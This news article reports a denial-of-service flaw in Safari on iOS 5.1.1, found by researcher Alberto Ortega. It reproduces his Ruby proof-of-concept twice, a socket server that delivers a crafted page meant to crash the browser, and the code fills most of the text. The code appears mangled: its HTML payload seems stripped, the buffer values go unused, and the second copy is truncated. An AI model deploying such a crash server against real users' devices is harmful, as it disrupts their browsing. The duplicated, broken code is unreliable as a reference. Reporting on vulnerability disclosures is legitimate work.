A denial of service attack has been disclosed in the latest version of Apple iOS.
The attack targets Safari in iOS 5.1.1 and a proof of concept was published online.
Alienvault security researcher Alberto Ortega said the attack may also affect previous versions of the Apple operating system.
The attack was successfully demonstrated on iPhone, iPad and iPod Touch.
Ortega said the error was a "step to achieve a real exploitation".
"iOS has a lot of mitigations to avoid successful exploitation," Ortega said. "This software has errors and holes but you will need to bypass those hard mitigations and find more weaknesses to have something "usable'."
Ortega reported the error to Apple at the time of disclosure but had no response from the notoriously security silent company.
“When JavaScript function match() gets a big buffer as parameter the browser unexpectedly crashes. By extension, the function search() is affected too,” Ortega said in the advisory.
require "socket" require "optparse" # Buffer values chr = "A" # The size of buffer needed may vary depending # on the device and the iOS version. buffer_len = 925000 # Magic packet body = "\ \n\ Crash PoC\n\ \n\ "; def help() puts "iOS <= v5.1.1 Safari Browser JS match(), search() Crash PoC" puts "#{$0} -p bind_port [-h bind_address] [--verbose]" end # Parsing options opts = {} optparser = OptionParser.new do |op| op.on("-h", "--host HOST") do |p| opts["host"] = p end op.on("-p", "--port PORT") do |p| opts["port"] = p end op.on("-v", "--verbose") do |p| opts["verbose"] = true end end begin optparser.parse! rescue help() exit 1 end if (opts.length == 0 || opts["port"] == nil) help() exit 1 end if (opts["verbose"] != nil) debug = true else debug = false end if (opts["host"] != nil) host = opts["host"] else host = "0.0.0.0" end port = opts["port"] # Building server if debug puts "Buffer -> #{chr}*#{buffer_len}" end begin serv = TCPServer.new(host, port) puts "Listening on #{host}:#{port.to_s} ..." rescue puts "Error listening on #{host}:#{port.to_s}" exit 1 end begin s = serv.accept() if debug puts "Client connected, waiting petition ..." end data = s.recv(1000) if debug puts "Sending crafted packet ..." end s.print(body) if debug puts "Closing connection ..." end s.close() puts "Done!" rescue puts "Error sending data" exit 1 end
require "socket" require "optparse" # Buffer values chr = "A" # The size of buffer needed may vary depending # on the device and the iOS version. buffer_len = 925000 # Magic packet body = "\ \n\ Crash PoC\n\ \n\ "; def help() puts "iOS <= v5.1.1 Safari Browser JS match(), search() Crash PoC" puts "#{$0} -p bind_port [-h bind_address] [--verbose]" end # Parsing options opts = {} optparser = OptionParser.new do |op| op.on("-h", "--host HOST") do |p| opts["host"] = p end op.on("-p", "--port PORT") do |p| opts["port"] = p end op.on("-v", "--verbose") do |p| opts["verbose"] = true end end begin optparser.parse! rescue help() exit 1 end if (opts.length == 0 || opts["port"] == nil) help() exit 1 end if (opts["verbose"] != nil) debug = true else debug = false end if (opts["host"] != nil) host = opts["host"] else host = "0.0.0.0" end port = opts["port"] # Building server if debug puts "Buffer -> #{chr}*#{buffer_len}" end begin serv = TCPServer.new(host, port) puts "Listening on #{host}:#{port.to_s} ..." rescue puts "Error listening on #{host}:#{port.to_s}" exit 1 end begin s = serv.accept() if debug puts "Client connected, waiting petition ..." end data = s.recv(1000) if debug puts "Sending crafted packet ..." end s.print(body) if debug puts "Closing connection ..." end s.close() puts "Done!" rescue puts "Error sending data" exit 1
Copyright © SC Magazine, Australia
Issue: 315 | May 2013
Access CRN's extensive online resources including; email bulletins, community discussions and unique online news.
Processing registration... Please wait.
This process can take up to a minute to complete.
A confirmation email has been sent to your email address - SUPPLIED GOES EMAIL HERE. Please click on the link in the email to verify your email address. You need to verify your email before you can log on to the CRN website or start posting comments on articles.
If you do not receive your confirmation email within the next few minutes, it may be because the email has been captured by a junk mail filter. Please ensure you add the domain '@crn.com.au' to your white-listed senders.
